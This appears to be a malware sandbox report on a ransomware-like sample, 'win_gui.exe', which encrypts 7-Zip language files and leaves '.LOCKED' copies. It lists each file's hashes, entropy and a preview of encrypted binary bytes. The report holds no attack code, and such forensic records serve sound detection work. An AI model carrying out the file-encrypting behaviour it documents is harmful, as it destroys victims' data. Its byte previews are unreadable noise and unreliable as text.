                                Preview:..Qu.a.1b....g..s..w./1'1..X.6U.... #.E......LU.J.L.G.7C...4.S....B....*....x..'v.kHD..U..<..g.(h.....).....;...A.e....!LiS...x`Ab..[.zp..~{..8.....T..K$..;:<.Q.....q.q.a.H,.V.n..O....].....|./........A....|.}..*..n...3k...+^x.9.:....a.."~*...at7R.H[Z..H;..T..c..(...k....eP...*1C..o.+.o*l9..F&.k@..a..w}.+9g#$...4.4..5>...u...v..t.Q>.KU../...1..]T....."...o.y..(....7........Z...ug.XvR.\.m#.955.$.5Y.S..a@....JX..=.Q..^......-h...d!!,:?.9....p/.;.......w..c...{.+$.S..........{.i..L.Bu.t0.u....s.G.S..V..4......,.....x..k..D.\.#FY.KEps).....T.....r..Y:|".E./.o..?.?.-.6nu.3..&......B.X...X..T~..e..#t.A...T:.p0...@x_.S..7....z._|.L.[............!.s3.N.M.T3/.E........ ..m6.B.:x....L.4...D....2t.$JO4......d.....*.......H ...m....z..J"P.?8#B....../.Y.v..'..$.di.<.nK..F\=.........{2...J...y..q.......0.]\..V.!s...[..S..v..9.93Tx...U....bt.0W......._....$c..J.....|..D.m..\2....jlt_T...12....?V.@.0........L...wTT.[.E..,>......l.DD..gy...P.8/

                                C:\Program Files\7-Zip\Lang\mk.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9364
                                Entropy (8bit):7.979071230498844
                                Encrypted:false
                                SSDEEP:192:eIQbi+ZuhP0k7gB7JqFc87FY9ANWgulbX02QHD+VO8Qa:e2xhck7gBM6KYKNHuldQj+VOza
                                MD5:9401D58D3219EFC9E2450EC9B116D545
                                SHA1:58FE21C687A75B09E20626988CD31C14CF1D1E25
                                SHA-256:2759336065620DF2B408D7EAD61BAD2971084CC79E23C5DE964F084F4D5BF6AF
                                SHA-512:39C497F4FA43F77FEA4A51EE694FF86841991BDCC90637D6F90545358875B90004BAEF71B94AFFDBC0EF438D833F853EF8D1FE2473A99447B609A8B66F66C4B1
                                Malicious:false
                                Preview:..Qu.a.1b....g..s..w./1'1..X.6U.... #.E......LU.J.L.G.7C...4.S....B....*....x..'v.kHD..U..<..g.(h.....).....;...A.e....!LiS...x`Ab..[.zp..~{..8.....T..K$..;:<.Q.....q.q.a.H,.V.n..O....].....|./........A....|.}..*..n...3k...+^x.9.:....a.."~*...at7R.H[Z..H;..T..c..(...k....eP...*1C..o.+.o*l9..F&.k@..a..w}.+9g#$...4.4..5>...u...v..t.Q>.KU../...1..]T....."...o.y..(....7........Z...ug.XvR.\.m#.955.$.5Y.S..a@....JX..=.Q..^......-h...d!!,:?.9....p/.;.......w..c...{.+$.S..........{.i..L.Bu.t0.u....s.G.S..V..4......,.....x..k..D.\.#FY.KEps).....T.....r..Y:|".E./.o..?.?.-.6nu.3..&......B.X...X..T~..e..#t.A...T:.p0...@x_.S..7....z._|.L.[............!.s3.N.M.T3/.E........ ..m6.B.:x....L.4...D....2t.$JO4......d.....*.......H ...m....z..J"P.?8#B....../.Y.v..'..$.di.<.nK..F\=.........{2...J...y..q.......0.]\..V.!s...[..S..v..9.93Tx...U....bt.0W......._....$c..J.....|..D.m..\2....jlt_T...12....?V.@.0........L...wTT.[.E..,>......l.DD..gy...P.8/

                                C:\Program Files\7-Zip\Lang\mn.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9081
                                Entropy (8bit):7.975992807608002
                                Encrypted:false
                                SSDEEP:192:l8x/6QzKxuGgeFFRu01pVcgWHHtoICDwJhxMknYWVbsQy+VO5:+/6TxRgeFLdpd6toICgjMiYEgt+VO5
                                MD5:B565D774A0C5F6D3FE55F597FCFF4122
                                SHA1:9E4300F76BA204121F3593FDC4E9D3E976C93160
                                SHA-256:FD871DE1D994EB9FEE505F0C0EDBE6C22A2895FFD2AE6848C256215355E8A075
                                SHA-512:487BF0CC729B1F1EF08326671771ABBBFE3549F26B9928D8C1530D021DC56AF9DE15296789ECEC2C2F152DED6F923EA279CD0057BC4FEE497DAF1C715BF7F299
                                Malicious:false
                                Preview:.........,.1$....W. Z........w..k...Y.>.t..}..<{.....oJ.UW...>.R.x...;.}.VNruz;...4ZM..( .C-.[X(.[.....!.I....".<........R.e...Xp}.4...W^..8:H.O.+.{...u.;.<T]...a.3? ...0...0..J......zB..o.ED)...r.(B..K.....!..m>{4.....2.!c......{1t.....5...v.`....U.7.....;.=..1j.TZ.z.......ay,.2..,*.L.s..,...S......op.F...tB9]Y4.~.....].<m&...u$.<[...9..v...w!......q.7k?.d -........!..=.,P_.Qm..".....P.;.4.H.X;.jb.EJ?...N...If.....`.U...A.u....dl..3.P.(A[..H...#.A...8..B.?Xq.....hy...=`.dQ.,_.$*.).....%.B@U..F.....c.<.9.)%...*@...`.l....b8.?..a....r.o..k...Z...NN..60..r.bv...$q....../0..!yz.....M=..m...3.%7,,..jgL......./8....W.... ....c...]...y.p..'.e.HF.......>......G......s.%.6..KO..@<.&o."..5.]8.9..).d...5!X..l...S....3...!W..Q...3P.}..!...f...'.B.c.J.....H.....H.hab.....|y..H5M.a)..:s7x...V.KnY....Q.......e..`-.33.(.J.:.....A.|.l..<.Lx".n..Z@\.X+...'..9..iJ.....`..T2o.c.,.m... ...ot.qa1...?.|..t..dc.`o....(..p_0."....^[..`F(.)It[..=.=s..Q.w].i....

                                C:\Program Files\7-Zip\Lang\mn.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9081
                                Entropy (8bit):7.975992807608002
                                Encrypted:false
                                SSDEEP:192:l8x/6QzKxuGgeFFRu01pVcgWHHtoICDwJhxMknYWVbsQy+VO5:+/6TxRgeFLdpd6toICgjMiYEgt+VO5
                                MD5:B565D774A0C5F6D3FE55F597FCFF4122
                                SHA1:9E4300F76BA204121F3593FDC4E9D3E976C93160
                                SHA-256:FD871DE1D994EB9FEE505F0C0EDBE6C22A2895FFD2AE6848C256215355E8A075
                                SHA-512:487BF0CC729B1F1EF08326671771ABBBFE3549F26B9928D8C1530D021DC56AF9DE15296789ECEC2C2F152DED6F923EA279CD0057BC4FEE497DAF1C715BF7F299
                                Malicious:false
                                Preview:.........,.1$....W. Z........w..k...Y.>.t..}..<{.....oJ.UW...>.R.x...;.}.VNruz;...4ZM..( .C-.[X(.[.....!.I....".<........R.e...Xp}.4...W^..8:H.O.+.{...u.;.<T]...a.3? ...0...0..J......zB..o.ED)...r.(B..K.....!..m>{4.....2.!c......{1t.....5...v.`....U.7.....;.=..1j.TZ.z.......ay,.2..,*.L.s..,...S......op.F...tB9]Y4.~.....].<m&...u$.<[...9..v...w!......q.7k?.d -........!..=.,P_.Qm..".....P.;.4.H.X;.jb.EJ?...N...If.....`.U...A.u....dl..3.P.(A[..H...#.A...8..B.?Xq.....hy...=`.dQ.,_.$*.).....%.B@U..F.....c.<.9.)%...*@...`.l....b8.?..a....r.o..k...Z...NN..60..r.bv...$q....../0..!yz.....M=..m...3.%7,,..jgL......./8....W.... ....c...]...y.p..'.e.HF.......>......G......s.%.6..KO..@<.&o."..5.]8.9..).d...5!X..l...S....3...!W..Q...3P.}..!...f...'.B.c.J.....H.....H.hab.....|y..H5M.a)..:s7x...V.KnY....Q.......e..`-.33.(.J.:.....A.|.l..<.Lx".n..Z@\.X+...'..9..iJ.....`..T2o.c.,.m... ...ot.qa1...?.|..t..dc.`o....(..p_0."....^[..`F(.)It[..=.=s..Q.w].i....

                                C:\Program Files\7-Zip\Lang\mng.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):20798
                                Entropy (8bit):7.989939009321135
                                Encrypted:false
                                SSDEEP:384:bRemrodTzMoQc5/xU0V08dkCUISpxw7C2nXMwREaMEsu9B4+VOK:bRWdTzM8/D08qIp7C2DREZVu9eG
                                MD5:E8EDFF9352F09737356AEA272112767F
                                SHA1:B58A1FA77E8605BC6BD1727CA89BE74BD5AAA2C8
                                SHA-256:C05A9522AAD56A2C66B209E7EDA587D06D95FC2A5BF649E9878042D85DC99D4C
                                SHA-512:7C357390723E9CEA2EE6BF13030723987479593B348D94E21DEC7F01B32D008E9BCC025DE3EF44BFF21FD3FC9A3F2760DF4BA7D7DC8BF43ADA234930D02A0CB1
                                Malicious:false
                                Preview:.NC...!.K.n~.{3.vN...HX.f..ZX...5..0..'.........X......<{.et..#lxuD=.NH.>9j5.9)O.G&.o.v..K...ifB$.lr.N..3Q^...NF...5~.?.i.y0........T..:..Aj?.....P5.h...~....T.v...w..l.......O...G#...X...q&..t.F.....Hq...y..1.K.=3Dn..6...B.+P..j...ywN....'..$.G.H....:o`@u.^z..5!.....*.S..i(.|%....U.j...t.....-...Cl.zECX.....3...'.. .U...k.g.TY.Z......,/...$.G...T.........."....h.x)../..}.......A..@.:.It".b..:i.......s...F..g...WWL..)....._...,.....B.Zp.G.......s`c.,\X!...=Ua......j@L. o..i..y"....x`..Q>..X-....=.V......>e..H^.ka."}.)...l.#..h\.$*&.^N.-..5..... `$...~`......<.V..u..lj.:.......L.uD..)x7Fu..{\..v[.......{u.%.....#.........Z9C.@.;..._....('.|....A....q7..8..9{{'..QNdI..ulh.0JJ..........Z.........*.r.B.4..Ys....Q&k...j.K.x3Rs9K...t.g..R.(.u.7k.-.P.......u.)'w.I3.@]wO...L..]Q....z..v...1......I........++..L.....d...!l||.K...&.&WU5<.*Eu3{.....w..P.9?....8LV.(.}....}2G.I.../......u.^j.!W.CW%.|%d...Y.b.d.#...09.K.e.<....k.......2.p.. .

                                C:\Program Files\7-Zip\Lang\mng.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):20798
                                Entropy (8bit):7.989939009321135
                                Encrypted:false
                                SSDEEP:384:bRemrodTzMoQc5/xU0V08dkCUISpxw7C2nXMwREaMEsu9B4+VOK:bRWdTzM8/D08qIp7C2DREZVu9eG
                                MD5:E8EDFF9352F09737356AEA272112767F
                                SHA1:B58A1FA77E8605BC6BD1727CA89BE74BD5AAA2C8
                                SHA-256:C05A9522AAD56A2C66B209E7EDA587D06D95FC2A5BF649E9878042D85DC99D4C
                                SHA-512:7C357390723E9CEA2EE6BF13030723987479593B348D94E21DEC7F01B32D008E9BCC025DE3EF44BFF21FD3FC9A3F2760DF4BA7D7DC8BF43ADA234930D02A0CB1
                                Malicious:false
                                Preview:.NC...!.K.n~.{3.vN...HX.f..ZX...5..0..'.........X......<{.et..#lxuD=.NH.>9j5.9)O.G&.o.v..K...ifB$.lr.N..3Q^...NF...5~.?.i.y0........T..:..Aj?.....P5.h...~....T.v...w..l.......O...G#...X...q&..t.F.....Hq...y..1.K.=3Dn..6...B.+P..j...ywN....'..$.G.H....:o`@u.^z..5!.....*.S..i(.|%....U.j...t.....-...Cl.zECX.....3...'.. .U...k.g.TY.Z......,/...$.G...T.........."....h.x)../..}.......A..@.:.It".b..:i.......s...F..g...WWL..)....._...,.....B.Zp.G.......s`c.,\X!...=Ua......j@L. o..i..y"....x`..Q>..X-....=.V......>e..H^.ka."}.)...l.#..h\.$*&.^N.-..5..... `$...~`......<.V..u..lj.:.......L.uD..)x7Fu..{\..v[.......{u.%.....#.........Z9C.@.;..._....('.|....A....q7..8..9{{'..QNdI..ulh.0JJ..........Z.........*.r.B.4..Ys....Q&k...j.K.x3Rs9K...t.g..R.(.u.7k.-.P.......u.)'w.I3.@]wO...L..]Q....z..v...1......I........++..L.....d...!l||.K...&.&WU5<.*Eu3{.....w..P.9?....8LV.(.}....}2G.I.../......u.^j.!W.CW%.|%d...Y.b.d.#...09.K.e.<....k.......2.p.. .

                                C:\Program Files\7-Zip\Lang\mng2.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):22181
                                Entropy (8bit):7.991599348584246
                                Encrypted:true
                                SSDEEP:384:WZgsqu8QvxHjAFT1axR80wdSZnCW4TlEIuMi7q52VZM5sG/P2f6xSBqBKKk9y+Vz:7u8QvpjS1axhwdS5CLTQMi7UijwSYgyC
                                MD5:63E823985C1F3E22A7BD7B2F31922D5E
                                SHA1:94870247E08A87BCBD835D2AEA8DFDF3310398A2
                                SHA-256:BBDD26CD70E226698AA625E9CD70C6C472380D7334470E63373126A27451CDC5
                                SHA-512:D5A79E0A175EBB103022C4D2A00DB28BD5C6CF0373DC36F963812F99EF59C8452767FBCF3F87CA13355EA808A07A6CCEC3FFD9AA8180DB182D1396A93A04BBFD
                                Malicious:true
                                Preview:..om..QU.H...q...0O.........p..(...uc."...lo.....+..W2..S..v....u.....r.......f..}..![.*m6ZX......|.N]..7q.G........b.....-..w........O.........xo...=.W'.P.Mt........2...=...M..PEa.>{:Nh?x......(x..w.GGJE?.../......B.Q.....k.......Y.....o.q.=bw.c.D.....8b....85YF.$.|G.....N.z.=..S..Ra.....(1$_"p.....Z3.".].a..._..s....G..9..h...w...I....Wz....M=KZ...t.|id)A6....z........@`.+..0..B........E...s.?j..l.....[.*..r.f.32.M4..u.<../<...=b.."aB.........MKT..s..8p..y.e.x..R.vx<..X.l.....3....q.........+p[..[.V.55I..[l.(...d.;..{..Do.. .I..*.....}.e..d+..../I(.>.Jej...k.YY@+..n..}mP....c.)...../......i.....!.......JD....S..f.-..zL...8.^i....dc`....};.`([.....e..F..s.?p........]_D.+.]w.k....V.`..x.o..r..{.....jva..k.c.@..[...G....+....)BG.4z....o..d.\40..QBe..e..._Ye.+.xITp%u.v6U...t`C@....CbV8Z.0l.@K.P^L.*.....F..=..}...0.ND\F7..XecE$.Hq*..+.5..1.q...p[..a...b....S.\.,x.8.8..k%..m.c.y-..}.l....}.9.oK(..z.s..C.vq.....A.... .Wdj.....aq...

                                C:\Program Files\7-Zip\Lang\mng2.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):22181
                                Entropy (8bit):7.991599348584246
                                Encrypted:true
                                SSDEEP:384:WZgsqu8QvxHjAFT1axR80wdSZnCW4TlEIuMi7q52VZM5sG/P2f6xSBqBKKk9y+Vz:7u8QvpjS1axhwdS5CLTQMi7UijwSYgyC
                                MD5:63E823985C1F3E22A7BD7B2F31922D5E
                                SHA1:94870247E08A87BCBD835D2AEA8DFDF3310398A2
                                SHA-256:BBDD26CD70E226698AA625E9CD70C6C472380D7334470E63373126A27451CDC5
                                SHA-512:D5A79E0A175EBB103022C4D2A00DB28BD5C6CF0373DC36F963812F99EF59C8452767FBCF3F87CA13355EA808A07A6CCEC3FFD9AA8180DB182D1396A93A04BBFD
                                Malicious:true
                                Preview:..om..QU.H...q...0O.........p..(...uc."...lo.....+..W2..S..v....u.....r.......f..}..![.*m6ZX......|.N]..7q.G........b.....-..w........O.........xo...=.W'.P.Mt........2...=...M..PEa.>{:Nh?x......(x..w.GGJE?.../......B.Q.....k.......Y.....o.q.=bw.c.D.....8b....85YF.$.|G.....N.z.=..S..Ra.....(1$_"p.....Z3.".].a..._..s....G..9..h...w...I....Wz....M=KZ...t.|id)A6....z........@`.+..0..B........E...s.?j..l.....[.*..r.f.32.M4..u.<../<...=b.."aB.........MKT..s..8p..y.e.x..R.vx<..X.l.....3....q.........+p[..[.V.55I..[l.(...d.;..{..Do.. .I..*.....}.e..d+..../I(.>.Jej...k.YY@+..n..}mP....c.)...../......i.....!.......JD....S..f.-..zL...8.^i....dc`....};.`([.....e..F..s.?p........]_D.+.]w.k....V.`..x.o..r..{.....jva..k.c.@..[...G....+....)BG.4z....o..d.\40..QBe..e..._Ye.+.xITp%u.v6U...t`C@....CbV8Z.0l.@K.P^L.*.....F..=..}...0.ND\F7..XecE$.Hq*..+.5..1.q...p[..a...b....S.\.,x.8.8..k%..m.c.y-..}.l....}.9.oK(..z.s..C.vq.....A.... .Wdj.....aq...

                                C:\Program Files\7-Zip\Lang\mr.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11407
                                Entropy (8bit):7.984887276848373
                                Encrypted:false
                                SSDEEP:192:0vlk8gArDLJYmTmi+F5Ht4sMwRVDYtaSJhOMyqDqMD1iATRBQQx/6gmlzyGtef+n:0vlHgArDRTmhRtpHRVEhhOMxDq0lBQ0a
                                MD5:9EE659FE51511E60F0A2E4184541182E
                                SHA1:ACE6C9377BDF8192F1A17175430F2B3E2C0C576C
                                SHA-256:946B9C16ED9B7CBCCE5F690BEEDAFEB12A79B0146B176E2D0BA0B87FDDDCCA19
                                SHA-512:5C2A5CF93AFE83D1753A37A5D5C1EC6552946D0151275B3A558AA5CE0C533E657255A7B7C778E9840412D0C8712B4934FAD64F10C717198C100C68231C57F2B1
                                Malicious:false
                                Preview:....:S../R.m.g..c...](d_.Cl......*X.*P.v)..}=....OX..a.........B9..}.q..u.v.|.....f*XXV.l..t.....z..v|u...`!x......Y..kH.#0W.V..5q?'......P........[.l.\[........s.+.......&.HM+h.......Q....4.;...I......z.....`....sW{..v.A1!./..W![...O.."TX.Q7i.?.E.9.Xh.z..}.X@......g.9%|zv:...|..4..dyc...}...:.s.3....&..".m.*....w...g...|?.*;.}(.?..f...R...I.\.O.C....F.e8b1!9 .+.....aL.'.Yb9V...~.y....C...*e...Wkn@`........:5./\P.cv.I..B.k.p.:Qm"6...}.%..vv..3......,b..$'>.........9}....K.'m.*.#Y+...b........\.~q...H..z.....*..r..fH..5...l..C~./.J0+:..}.H........l5.......%..H..N.p.}....B\E!P.......}qyje....K.,`).[..).2.T...\.@.!.'..t.....?#=..n...{.'..r..Q..4......r.......L.k.F ..b..,.D./.H}h..vd.?.L......or..........CX...e"M..re0.ZHh&MV'.../|a..!..~..=..:V..QV......i4..A....X.).`.....i.........z..s...[..T..Q.9.......qx......5.&...g.........N&q.8......;n5`GB.gdb.RF[...a%...U..:..lwA..T.N`0.2.... .t.o,.X.........93..kB.30,?......!.(...M...W.O.../.!A.{..h..4.

                                C:\Program Files\7-Zip\Lang\mr.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11407
                                Entropy (8bit):7.984887276848373
                                Encrypted:false
                                SSDEEP:192:0vlk8gArDLJYmTmi+F5Ht4sMwRVDYtaSJhOMyqDqMD1iATRBQQx/6gmlzyGtef+n:0vlHgArDRTmhRtpHRVEhhOMxDq0lBQ0a
                                MD5:9EE659FE51511E60F0A2E4184541182E
                                SHA1:ACE6C9377BDF8192F1A17175430F2B3E2C0C576C
                                SHA-256:946B9C16ED9B7CBCCE5F690BEEDAFEB12A79B0146B176E2D0BA0B87FDDDCCA19
                                SHA-512:5C2A5CF93AFE83D1753A37A5D5C1EC6552946D0151275B3A558AA5CE0C533E657255A7B7C778E9840412D0C8712B4934FAD64F10C717198C100C68231C57F2B1
                                Malicious:false
                                Preview:....:S../R.m.g..c...](d_.Cl......*X.*P.v)..}=....OX..a.........B9..}.q..u.v.|.....f*XXV.l..t.....z..v|u...`!x......Y..kH.#0W.V..5q?'......P........[.l.\[........s.+.......&.HM+h.......Q....4.;...I......z.....`....sW{..v.A1!./..W![...O.."TX.Q7i.?.E.9.Xh.z..}.X@......g.9%|zv:...|..4..dyc...}...:.s.3....&..".m.*....w...g...|?.*;.}(.?..f...R...I.\.O.C....F.e8b1!9 .+.....aL.'.Yb9V...~.y....C...*e...Wkn@`........:5./\P.cv.I..B.k.p.:Qm"6...}.%..vv..3......,b..$'>.........9}....K.'m.*.#Y+...b........\.~q...H..z.....*..r..fH..5...l..C~./.J0+:..}.H........l5.......%..H..N.p.}....B\E!P.......}qyje....K.,`).[..).2.T...\.@.!.'..t.....?#=..n...{.'..r..Q..4......r.......L.k.F ..b..,.D./.H}h..vd.?.L......or..........CX...e"M..re0.ZHh&MV'.../|a..!..~..=..:V..QV......i4..A....X.).`.....i.........z..s...[..T..Q.9.......qx......5.&...g.........N&q.8......;n5`GB.gdb.RF[...a%...U..:..lwA..T.N`0.2.... .t.o,.X.........93..kB.30,?......!.(...M...W.O.../.!A.{..h..4.

                                C:\Program Files\7-Zip\Lang\ms.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5797
                                Entropy (8bit):7.96463843893395
                                Encrypted:false
                                SSDEEP:96:O3IqFQYoATpKzdzEaL/1N+lJupUse/u6qwEKqM+Pf5sVhPE5KeraYyutevuAVOb4:O4slo2gJz1ClVs2uFKqf5WMFraGt+VOc
                                MD5:8FC6160D28ACBB935E0D1E24B8E09A01
                                SHA1:66F05F82A2AD9F2DB3FE9DAFEA66ACAA1460FB8B
                                SHA-256:BBD96C13CFBCF10634A52CEEC5D27E21B67F30CEF15FD673D47236587F46B245
                                SHA-512:27F2AF53227F4045D49B3D28CAF7EB2C5E8A947BD7883A401E88CC86B170E394D28C36505281FBCE8B9934C9E101B51AE3E0E1082453B9F88E415A5E33097459
                                Malicious:false
                                Preview:Tg.C{.[-R..c...fh.`.{S...C`w..l..[.mK.C.X..p3..../>.#.1.......@<... ..t.KL.@.#..i.$z..I..^."8.A`......A.[.p#..`$.s.K@.WR...........y[]Zf].+..l3...NK.X.s.L..hi..u.=.=.me.....cb$.d........d..8.93.....{&-....j.....Y.q=h....L.!:...6.fWQ.X..w#.B.ZXa..=......`../...w..o'.P.....!..........XD...h.v...lJ]....h.L....L.A.)...u.8.t....^.<..O.m..$.<T...j$.i.........-..s..-...Ol.d.5S......O..}...iS(.,Z..c.^h.W..Ss...HP.u..|O....:0...V.:m@.5.....">T5.,o.)Q$H.r..<..}..9lX:.\..Ndv[..%../..q.x..g.$.9...O.Q....W...J..o.....}..R@.2.o...+).....9.......}..n........;.I.j...53.e.....S....1..Y..fU.qF< @+1...@}.#.f.F...}..R.=..F.._0.$..ei..XD!eQ.w.hm...=.+....J.9.r../..|...5Q^E5.k...b.. ...r.....{2K......?..'H'.....d..{.:bR.H.z...L..Xe..r\..t4^K.;..._..3...........Sq..Z5.....[...l.=.[....o..H..*..1o<...i.d..K6..V...$.s..?&........1P....X.....;X........N.?.....UMC...w.P....."..Wqv..Vp....C..|C.*.|OO7..8..D.r.K.p.....k...-b..zD..?4......_...D.....\..%..t...Y....i.o......H.

                                C:\Program Files\7-Zip\Lang\ms.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5797
                                Entropy (8bit):7.96463843893395
                                Encrypted:false
                                SSDEEP:96:O3IqFQYoATpKzdzEaL/1N+lJupUse/u6qwEKqM+Pf5sVhPE5KeraYyutevuAVOb4:O4slo2gJz1ClVs2uFKqf5WMFraGt+VOc
                                MD5:8FC6160D28ACBB935E0D1E24B8E09A01
                                SHA1:66F05F82A2AD9F2DB3FE9DAFEA66ACAA1460FB8B
                                SHA-256:BBD96C13CFBCF10634A52CEEC5D27E21B67F30CEF15FD673D47236587F46B245
                                SHA-512:27F2AF53227F4045D49B3D28CAF7EB2C5E8A947BD7883A401E88CC86B170E394D28C36505281FBCE8B9934C9E101B51AE3E0E1082453B9F88E415A5E33097459
                                Malicious:false
                                Preview:Tg.C{.[-R..c...fh.`.{S...C`w..l..[.mK.C.X..p3..../>.#.1.......@<... ..t.KL.@.#..i.$z..I..^."8.A`......A.[.p#..`$.s.K@.WR...........y[]Zf].+..l3...NK.X.s.L..hi..u.=.=.me.....cb$.d........d..8.93.....{&-....j.....Y.q=h....L.!:...6.fWQ.X..w#.B.ZXa..=......`../...w..o'.P.....!..........XD...h.v...lJ]....h.L....L.A.)...u.8.t....^.<..O.m..$.<T...j$.i.........-..s..-...Ol.d.5S......O..}...iS(.,Z..c.^h.W..Ss...HP.u..|O....:0...V.:m@.5.....">T5.,o.)Q$H.r..<..}..9lX:.\..Ndv[..%../..q.x..g.$.9...O.Q....W...J..o.....}..R@.2.o...+).....9.......}..n........;.I.j...53.e.....S....1..Y..fU.qF< @+1...@}.#.f.F...}..R.=..F.._0.$..ei..XD!eQ.w.hm...=.+....J.9.r../..|...5Q^E5.k...b.. ...r.....{2K......?..'H'.....d..{.:bR.H.z...L..Xe..r\..t4^K.;..._..3...........Sq..Z5.....[...l.=.[....o..H..*..1o<...i.d..K6..V...$.s..?&........1P....X.....;X........N.?.....UMC...w.P....."..Wqv..Vp....C..|C.*.|OO7..8..D.r.K.p.....k...-b..zD..?4......_...D.....\..%..t...Y....i.o......H.

                                C:\Program Files\7-Zip\Lang\nb.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6661
                                Entropy (8bit):7.974393688679913
                                Encrypted:false
                                SSDEEP:192:mNxLVJpGOsWBkSgypqggxMSZVbEkNI+VOI:0zTGJSkSCX6SrnNI+VOI
                                MD5:DD6DA9559642A2E63980CB7942B4A9E3
                                SHA1:E5DA0A5EC01D2A38FCA47E7B7496F6D1E1D7844E
                                SHA-256:34AA0D2D77FC4D775B7B4E0B1E4F0545004DBC410458CE233FC41AEF2CC8D48D
                                SHA-512:20C84401A03A0D82B8C7DE14A0F6CD93D802ED3C583E4454055E1CAC269854B74C6ABA04E05E750FC2ECC91DD93D08E9E67BA9BE745EB275C3B988BF7CC88856
                                Malicious:false
                                Preview:...D.H.@&.#...GD6....Aj.t.G4j.".B.Y.!...q.V........!..........)~IIo....Mq.R..."....[q..)...O.a(.....&1..>2...^..L...M...4.2K.f..Q.z....~.._...,L...[.....C.W..:. k.MQiL....2?s..U.}.1@E.w..j.|.a..X..ibts.4.],.../..%qJ.;'...^....f..H..].S..Zv.D....G..S%...'.....Dq.=u..<.../..L....Z.K...5.7...J....b<.lr:....E.... .z..B0N..HBp.:...j.<..w........zP.Q[..x<....{H.@Q9...h......j.L....r0.p&..[?... .....J...K(..C.i...h.g.4T.l.*.p..._V...<,..+`.z..!...\}...IJCh?V..7.X^..2|...L.%...|.@.....C....7M{.\'.V......M.B5?.Dh........C....,{r.b#6..]^,.......,.o..-"..H.".._1F.......?+....hs........fOe.wb..Vl.bD..p......'Jl.6R.....s<g\.S....'~.p.....PY.a....\RJ.78_.U..~{.R.i.rAd.AFt.w8."?UF..u.h}TF....J%L...t....l....&..g!...;5=.1.P......N\{.[.[.z......d..3f...!.f.J.....\c.....9. ..L.ex<f.Rmo....F.#...).....bHl.|?geS%..{..6....[....d_..G...|.-S_\...o+..)...oc....{L..ngI....=..t.Y....I2.k-|)...f.Zz!..Hv......S9-....`..w.'.c...i..-s>.J..G]..?, ..........W$;.

                                C:\Program Files\7-Zip\Lang\nb.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6661
                                Entropy (8bit):7.974393688679913
                                Encrypted:false
                                SSDEEP:192:mNxLVJpGOsWBkSgypqggxMSZVbEkNI+VOI:0zTGJSkSCX6SrnNI+VOI
                                MD5:DD6DA9559642A2E63980CB7942B4A9E3
                                SHA1:E5DA0A5EC01D2A38FCA47E7B7496F6D1E1D7844E
                                SHA-256:34AA0D2D77FC4D775B7B4E0B1E4F0545004DBC410458CE233FC41AEF2CC8D48D
                                SHA-512:20C84401A03A0D82B8C7DE14A0F6CD93D802ED3C583E4454055E1CAC269854B74C6ABA04E05E750FC2ECC91DD93D08E9E67BA9BE745EB275C3B988BF7CC88856
                                Malicious:false
                                Preview:...D.H.@&.#...GD6....Aj.t.G4j.".B.Y.!...q.V........!..........)~IIo....Mq.R..."....[q..)...O.a(.....&1..>2...^..L...M...4.2K.f..Q.z....~.._...,L...[.....C.W..:. k.MQiL....2?s..U.}.1@E.w..j.|.a..X..ibts.4.],.../..%qJ.;'...^....f..H..].S..Zv.D....G..S%...'.....Dq.=u..<.../..L....Z.K...5.7...J....b<.lr:....E.... .z..B0N..HBp.:...j.<..w........zP.Q[..x<....{H.@Q9...h......j.L....r0.p&..[?... .....J...K(..C.i...h.g.4T.l.*.p..._V...<,..+`.z..!...\}...IJCh?V..7.X^..2|...L.%...|.@.....C....7M{.\'.V......M.B5?.Dh........C....,{r.b#6..]^,.......,.o..-"..H.".._1F.......?+....hs........fOe.wb..Vl.bD..p......'Jl.6R.....s<g\.S....'~.p.....PY.a....\RJ.78_.U..~{.R.i.rAd.AFt.w8."?UF..u.h}TF....J%L...t....l....&..g!...;5=.1.P......N\{.[.[.z......d..3f...!.f.J.....\c.....9. ..L.ex<f.Rmo....F.#...).....bHl.|?geS%..{..6....[....d_..G...|.-S_\...o+..)...oc....{L..ngI....=..t.Y....I2.k-|)...f.Zz!..Hv......S9-....`..w.'.c...i..-s>.J..G]..?, ..........W$;.

                                C:\Program Files\7-Zip\Lang\ne.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14062
                                Entropy (8bit):7.986586784450276
                                Encrypted:false
                                SSDEEP:384:nlEe7CFY+YGike2nuBa4gRUCjB08gWFr19Hi+VOO:nL7CqvGbUCjBFp9HiS
                                MD5:E2FB26392AA3D6B9C219267B284027EF
